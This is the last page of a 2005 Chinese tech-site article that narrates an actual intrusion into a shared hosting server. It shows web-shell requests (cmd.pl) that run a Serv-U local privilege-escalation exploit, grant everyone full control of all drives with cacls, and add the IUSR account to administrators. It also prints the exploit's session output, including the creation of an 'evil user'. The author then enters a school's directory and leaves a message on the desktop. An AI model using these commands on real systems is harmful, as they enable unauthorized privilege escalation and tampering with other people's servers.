通行证: 用户 密码
http://www.pconline.cn/
汽车网 | 游戏网 | 时尚女性
北京 上海 广州 深圳 香港 广西
重庆 山东 江苏 辽宁 福建 成都
首 页 | 今日报价 | 产业资讯 | 数码世界 | 硬件资讯 | 软件资讯 | 下 载 | 游 戏 |
论 坛 | 产 品 库 | 渠道商情 | 招聘培训 | 二    手 | 评 测 室 | 导 购 | 社 区 |
摄影
部落
手 机
数码相机
随身听
 DIY配件
笔记本
 台式机
摄像机
精品廊
-
您现在的位置: 软件资讯 > 软件应用 > 信息安全 > 黑客攻防战 免费新闻代码RSS新闻聚合
  你BT我更BT!记一次入侵BT服务器 出处:太平洋电脑网
[ 2005-10-14 10:20:41 ] 作者:佚名 责任编辑:linjixiong



  嘻嘻~~现在是 IUSR 权限,那又怎么样?看你这次还不死?提交:



http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"


  返回下面的信息,就表示成功了!!!



Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
******************************************************


  每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为 everyone 完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员:



  http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"



  现在我们通过 web 方式,执行的命令就是以 administrator 的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个 3389 的肉鸡的,想想算了,这种 BT 管理员的地盘,我也占领不了多久,留点提示到他的桌面就 over 了。

  说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了 Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。
来PConline劲爆论坛抢大奖!马上点击进入网络安全讨论区


[上一页] [1] [2] [3] [4]

更多相关搜索: BT.. 服务器.. 黑客.. 入侵.. 红客..
正在加载评论,请稍候…

发给好友 我要报错 投稿给我们 加入收藏 返回顶部

本栏今日更新
相关文章
·火速!仅隔一月iTunes新版又登场
·微软企业级安全软件即将推出
·Windows平台未来将直接支持RM?
·快升级!微软10月安全补丁发布
·超便捷:MSN Msg Plus!新版惊喜试用
·用XP硬件配置文件提高启动速度
·视频教程:超级兔子入门技巧
·冰凉新世界漂亮主题

完美时尚娱乐:2004年腾讯QQ评测大观
精彩无限:MSN Shell4使用指南
亲手制作鲜花情人贺卡送给她
挑战伏明霞?企鹅跳水游戏,看你能得多少分?

新闻搜索
高级搜索
-
热点专题
·Macromedia Studio8专题
·挑战十大Flash智益游戏
·QQ辅助软件使用指南
·向"流氓软件"大声说不!
·惜别!毕业十大必唱歌曲
·搜索技巧:网罗天下的乐趣
·电脑艺术设计大师之路连载
·老歌歪唱Flash MV爆笑欣赏
更多...
Flash排行榜

·宇春:我心里只有你沒有他
·超级女声笔畅-《笔记》
·超女张含韵-《想唱就唱》
·密室逃脱游戏- 空房出逃
·爱情的宽容-《别人》
·搞笑动脑游戏-商店神偷
·惊险逃离游戏-逃离鬼屋
·雨夜恐怖古宅探秘游戏
·那些曾为你流下的眼泪
·紧急逃离-即将沉没的船

更多...
IT培训热门文章
· 月薪5万,微软最新面试题
· 微软召开黑客大会(图)
· 美军超级黑客特种部队揭密
· Linux下软件安装详解(图)
· 软考模拟软件(网络工程师)
· 2005年软件水平考试资料
· 世界编程大赛第1名写的程序
· 某变态公司的面试IQ题
更多...
PConline频道精选